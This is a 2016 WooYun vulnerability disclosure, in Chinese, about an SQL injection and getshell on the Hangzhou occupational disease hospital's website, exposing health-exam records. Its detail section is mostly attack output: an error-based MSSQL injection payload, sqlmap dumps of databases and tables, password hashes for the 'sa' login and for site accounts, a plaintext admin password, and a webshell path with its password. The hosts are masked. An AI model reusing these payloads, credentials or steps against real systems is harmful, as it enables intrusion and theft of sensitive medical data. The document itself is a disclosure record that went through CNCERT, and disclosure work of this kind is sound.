杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0200534

漏洞标题：杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

漏洞作者：路人甲

提交时间：2016-04-26 11:40

修复时间：2016-06-12 18:00

公开时间：2016-06-12 18:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-26：细节已通知厂商并且等待厂商处理中
2016-04-28：厂商已经确认，细节仅向厂商公开
2016-05-08：细节向核心白帽子及相关领域专家公开
2016-05-18：细节向普通白帽子公开
2016-05-28：细节向实习白帽子公开
2016-06-12：细节向公众公开

简要描述：

如题、、、

详细说明：

杭州市职业病防治院某处漏洞(getshell)泄露几十万份详细体检报告..
杭州市职业病防治院某处SQL注入漏洞，发现是SA 权限跑出大量敏感数据，登录网站后台直接任意文件上传getshell 、、、、
泄露几十万份详细的体检报告以及该防治院医生信息。。。。
注入点：http://**.**.**.**/search/?key=
后台：http://**.**.**.**/admin admin qwertyuiop4824
shell：http://**.**.**.**/data/files/20160425151351.aspx F4ck

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=%' AND 7049=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(118) CHAR(114)
 CHAR(58) (SELECT (CASE WHEN (7049=7049) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(
58) CHAR(105) CHAR(108) CHAR(108) CHAR(58))) AND '%'='
---
[10:31:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] fzy
[*] hzpcc
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
current database:    'fzy'
current user:    'sa'
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
        header: 0x0100
        salt: 3869d680
        mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
        header: 0x0100
        salt: 8d22a249
        mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] sa [1]:
    password hash: 0x010056049b0ef1e0c5755578b528f857fd1b3a895054a5611f69
        header: 0x0100
        salt: 56049b0e
        mixedcase: f1e0c5755578b528f857fd1b3a895054a5611f69
Database: fzy
[24 tables]
+--------------------+
| TN_ACCOUNT         |
| TN_ARTICLE         |
| TN_ARTICLE_CATALOG |
| TN_BOX_RECV        |
| TN_BOX_SEND        |
| TN_CGJ_BG          |
| TN_CGJ_DJ          |
| TN_COLUMN          |
| TN_DEPT            |
| TN_ENUM            |
| TN_GROUP           |
| TN_LINK            |
| TN_LINK_CATALOG    |
| TN_LY              |
| TN_MODULE_USER     |
| TN_MSG             |
| TN_PARAM           |
| TN_RECRUITMENT     |
| TN_TG              |
| TN_USER            |
| TN_WZ              |
| TN_XF              |
| TN_ZB              |
| TN_ZB_TYPE         |
+--------------------+

漏洞证明：

Database: fzy
Table: TN_USER
[18 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| dept_id        | varchar  |
| idcard         | varchar  |
| isdelete       | int      |
| isleader       | int      |
| sex            | int      |
| user_birthday  | datetime |
| user_email     | varchar  |
| user_id        | varchar  |
| user_job       | varchar  |
| user_login     | varchar  |
| user_mobile    | varchar  |
| user_name      | varchar  |
| user_no        | varchar  |
| user_office    | varchar  |
| user_phone     | varchar  |
| user_pic       | varchar  |
| user_pwd       | varchar  |
| user_virtualno | varchar  |
+----------------+----------+
Database: fzy
Table: TN_ACCOUNT
[4 entries]
+-----------------------------------------+------------+
| user_pwd                                | user_login |
+-----------------------------------------+------------+
| 540bd55a2cf295b8ea9cd78650e89d03 (0019) | 0019       |
| 5e90ae5f6eb12b3f3e3c86c0409de103 (0207) | 0207       |
| a47fa956d8c823d9e8a47d0cbffc20b5        | admin      |qwertyuiop4824
| fc1198178c3594bfdda3ca2996eb65cb        | 0010       |
+-----------------------------------------+------------+

修复方案：

过滤吧。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-28 17:54

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给浙江分中心，由浙江分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0200534

漏洞标题：杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

相关厂商：杭州市职业病防治院

漏洞作者：路人甲

提交时间：2016-04-26 11:40

修复时间：2016-06-12 18:00

公开时间：2016-06-12 18:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0200534

漏洞标题：杭州市职业病防治院某处漏洞(Getshell)涉及几十万份详细体检报告

相关厂商：杭州市职业病防治院

漏洞作者： 路人甲

提交时间：2016-04-26 11:40

修复时间：2016-06-12 18:00

公开时间：2016-06-12 18:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0200534"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云